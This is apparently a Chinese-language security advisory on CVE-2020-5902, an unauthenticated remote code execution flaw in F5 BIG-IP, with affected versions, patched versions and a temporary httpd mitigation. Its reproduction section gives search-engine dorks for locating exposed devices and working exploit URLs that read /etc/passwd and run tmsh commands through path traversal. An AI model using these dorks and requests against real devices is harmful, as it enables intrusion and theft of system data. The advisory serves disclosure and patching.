0x01 漏洞詳情
F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、web網關、負載均衡等功能的應用交付平台。
2020年07月03日, 360CERT監測發現 F5 發布了 F5 BIG-IP 遠程代碼執行 的風險通告,該漏洞編號為 CVE-2020-5902,漏洞等級:嚴重。
未授權的遠程攻擊者通過向漏洞頁面發送特制的請求包,可以造成任意 Java 代碼執行。進而控制 F5 BIG-IP 的全部功能,包括但不限於: 執行任意系統命令、開啟/禁用服務、創建/刪除服務器端文件等。該漏洞影響控制面板受影響,不影響數據面板。
對此,360CERT建議廣大用戶及時將 BIG-IP 按照修復建議升級到指定版本。與此同時,請做好資產自查以及預防工作,以免遭受黑客攻擊。
0x02 影響版本
- BIG-IP 15.x: 15.1.0 ~ 15.0.0
- BIG-IP 14.x: 14.1.0 ~ 14.1.2
- BIG-IP 13.x: 13.1.0 ~ 13.1.3
- BIG-IP 12.x: 12.1.0 ~ 12.1.5
- BIG-IP 11.x: 11.6.1 ~ 11.6.5
0x03 漏洞復現
搜索語法
shodanhttp.favicon.hash:-335242539
fofatitle="BIG-IP®- Redirect"
googleintitle:"BIG-IP" inurl:"tmui"
文件讀取:
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE:
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
0x03 漏洞修復
升級到以下版本
- BIG-IP 15.x: 15.1.0.4
- BIG-IP 14.x: 14.1.2.6
- BIG-IP 13.x: 13.1.3.4
- BIG-IP 12.x: 12.1.5.2
- BIG-IP 11.x: 11.6.5.2
臨時修補建議:
官方建議可以通過以下步驟臨時緩解影響
- 使用以下命令登錄對應系統
tmsh
- 編輯
httpd組件的配置文件
edit /sys httpd all-properties
- 文件內容如下
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'
- 按照如下操作保存文件
按下 ESC 並依次輸入
:wq
- 執行命令刷新配置文件
save /sys config
- 重啟 httpd 服務
restart sys service httpd
並禁止外部IP對 TMUI 頁面的訪問